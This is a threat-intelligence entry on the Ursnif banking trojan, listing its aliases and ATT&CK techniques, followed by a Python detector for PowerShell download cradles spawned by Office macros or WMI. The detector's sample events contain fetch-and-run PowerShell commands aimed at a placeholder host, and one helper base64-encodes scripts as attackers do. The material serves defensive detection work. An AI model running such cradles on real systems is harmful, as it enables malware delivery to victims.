Ursnif

Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]

ID: S0386
Associated Software: Gozi-ISFB, PE_URSNIF, Dreambot
Type: MALWARE
Platforms: Windows
Version: 1.0

Associated Software Descriptions

Name | Description
Gozi-ISFB | [7][2]
PE_URSNIF | [3]
Dreambot | [1][2]

Techniques Used

Domain | ID | Name | Use
Enterprise | T1090 | Connection Proxy | Ursnif has used a peer-to-peer (P2P) network for C2. [1] [2]
Enterprise | T1094 | Custom Command and Control Protocol | Ursnif has used a custom packet format over TCP and UDP for a peer-to-peer (P2P) network for C2. [2]
Enterprise | T1132 | Data Encoding | Ursnif has used encoded data in HTTP URLs for C2. [2]
Enterprise | T1005 | Data from Local System | Ursnif has collected files from victim machines, including certificates and cookies. [4]
Enterprise | T1074 | Data Staged | Ursnif has used tmp files to stage gathered information. [3]
Enterprise | T1140 | Deobfuscate/Decode Files or Information | Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk. [2]
Enterprise | T1175 | Distributed Component Object Model | Ursnif droppers have used COM objects to execute the malware's full executable payload. [8]
Enterprise | T1483 | Domain Generation Algorithms | Ursnif has used a DGA to generate domain names for C2. [2]
Enterprise | T1106 | Execution through API | Ursnif has used CreateProcessW to create child processes. [7]
Enterprise | T1107 | File Deletion | Ursnif has deleted data staged in tmp files after exfiltration. [3]
Enterprise | T1179 | Hooking | Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers. [3]
Enterprise | T1185 | Man in the Browser | Ursnif has injected HTML code into banking sites to steal sensitive online banking information (e.g. usernames and passwords). [4]
Enterprise | T1036 | Masquerading | Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names. [3]
Enterprise | T1112 | Modify Registry | Ursnif has used Registry modifications as part of its installation routine. [4] [2]
Enterprise | T1188 | Multi-hop Proxy | Ursnif has used Tor for C2. [1] [2]
Enterprise | T1050 | New Service | Ursnif has registered itself as a system service in the Registry for automatic execution at system startup. [6]
Enterprise | T1027 | Obfuscated Files or Information | Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk. Ursnif droppers have also been delivered as password-protected zip files that execute base64-encoded PowerShell commands. [2] [8]
Enterprise | T1086 | PowerShell | Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload. [8]
Enterprise | T1057 | Process Discovery | Ursnif has gathered information about running processes. [3] [4]
Enterprise | T1093 | Process Hollowing | Ursnif has used process hollowing to inject into child processes. [7]
Enterprise | T1055 | Process Injection | Ursnif has injected code into target processes via thread local storage (TLS) callbacks. [3] [6] [7]
Enterprise | T1012 | Query Registry | Ursnif has used Reg to query the Registry for installed programs. [3] [4]
Enterprise | T1060 | Registry Run Keys / Startup Folder | Ursnif has used Registry Run keys to establish automatic execution at system startup. [6] [4]
Enterprise | T1105 | Remote File Copy | Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads. [6] [4]
Enterprise | T1091 | Replication Through Removable Media | Ursnif has copied itself to and infected removable drives for propagation. [3] [5]
Enterprise | T1113 | Screen Capture | Ursnif has used hooked APIs to take screenshots. [3] [4]
Enterprise | T1064 | Scripting | Ursnif droppers have used VBA macros and PowerShell to download and execute the malware's full executable payload. [8]
Enterprise | T1071 | Standard Application Layer Protocol | Ursnif has used HTTPS for C2 as well as HTTP POSTs to exfiltrate gathered information. [3] [7] [2]
Enterprise | T1082 | System Information Discovery | Ursnif has used Systeminfo to gather system information. [3]
Enterprise | T1007 | System Service Discovery | Ursnif has gathered information about running services. [3]
Enterprise | T1080 | Taint Shared Content | Ursnif has copied itself to and infected files on network drives for propagation. [3] [5]
Enterprise | T1497 | Virtualization/Sandbox Evasion | Ursnif has used a 30-minute delay after execution to evade sandbox monitoring tools. [5]
Enterprise | T1047 | Windows Management Instrumentation | Ursnif droppers have used WMI classes to execute PowerShell commands. [8]
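The dropper rows above (T1027, T1086, T1064, T1047) describe one chain: an Office macro or a WMI call launches PowerShell, frequently with a base64 -EncodedCommand, and the script is a download cradle that fetches and runs the full Ursnif executable. The following added example, which is not code from MITRE ATT&CK or from the cited reports, shows the detection logic a SOC would run over process-creation telemetry for that chain: it decodes the UTF-16LE/base64 -EncodedCommand argument, looks for a download primitive paired with an execution primitive, and weights the result by whether the parent process is an Office application or WmiPrvSE. The event field names (pid, parent_image, command_line), the indicator lists and the sample events are assumptions constructed for the example; the URLs use the reserved .invalid TLD.

```python
"""Detection helper for PowerShell download cradles launched from Office macros
or via WMI, optionally hidden behind a base64 -EncodedCommand (added example;
not code from MITRE ATT&CK or the cited Ursnif reports).  Event field names
and indicator lists are assumptions."""
import base64
import re

# A cradle needs a download primitive AND an execution primitive in one command.
DOWNLOAD_PRIMITIVES = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)
EXEC_PRIMITIVES = re.compile(
    r"\b(?:iex|invoke-expression|start-process)\b|&\s*\(", re.I)
# Parents that mean PowerShell was spawned by an Office macro or by WMI.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "wmiprvse.exe"}
# PowerShell accepts abbreviations of -EncodedCommand; match the common ones
# followed by a base64 blob (the "\s+" stops "-e" from matching -ExecutionPolicy).
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_for_powershell(script: str) -> str:
    """Build an -EncodedCommand value the way attackers do: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line: str):
    """Return the script hidden in a -EncodedCommand argument, or None."""
    m = ENC_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_event(event: dict) -> dict:
    """Tag one process-creation event with the cradle indicators it shows."""
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    visible = cmd + " " + (decoded or "")          # inspect the decoded script too
    indicators = []
    if decoded is not None:
        indicators.append("encoded_command")
    if DOWNLOAD_PRIMITIVES.search(visible) and EXEC_PRIMITIVES.search(visible):
        indicators.append("download_cradle")
    parent = event.get("parent_image", "").lower().rsplit("\\", 1)[-1]
    if parent in SUSPICIOUS_PARENTS:
        indicators.append("office_or_wmi_parent")
    # A cradle alone is enough to alert; otherwise require two weaker signals.
    alert = "download_cradle" in indicators or len(indicators) >= 2
    return {"pid": event["pid"], "decoded": decoded,
            "indicators": indicators, "alert": alert}


def scan(events):
    """Analyse a batch of process-creation events."""
    return [analyse_event(e) for e in events]


# Constructed sample telemetry (assumed format; not real Ursnif artefacts).
MACRO_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')"
SAMPLE_EVENTS = [
    {"pid": 4101, "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(MACRO_SCRIPT)},
    {"pid": 4102, "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": ("powershell.exe -ExecutionPolicy Bypass -Command \"(New-Object Net.WebClient)"
                      ".DownloadFile('http://example.invalid/u.exe','C:\\Users\\Public\\u.exe');"
                      "Start-Process C:\\Users\\Public\\u.exe\"")},
    {"pid": 4103, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 4104, "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -EncodedCommand "
                     + encode_for_powershell("Get-Service | Out-File svc.txt")},
]

if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["pid"], "ALERT" if r["alert"] else "ok", r["indicators"])
```

Matching on the decoded script rather than only the raw command line is the point of the example: the base64 blob hides DownloadString and IEX from naive string rules, and an encoded command on its own (event 4104, a benign admin script) is not enough to alert without a second signal such as an Office or WMI parent.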

References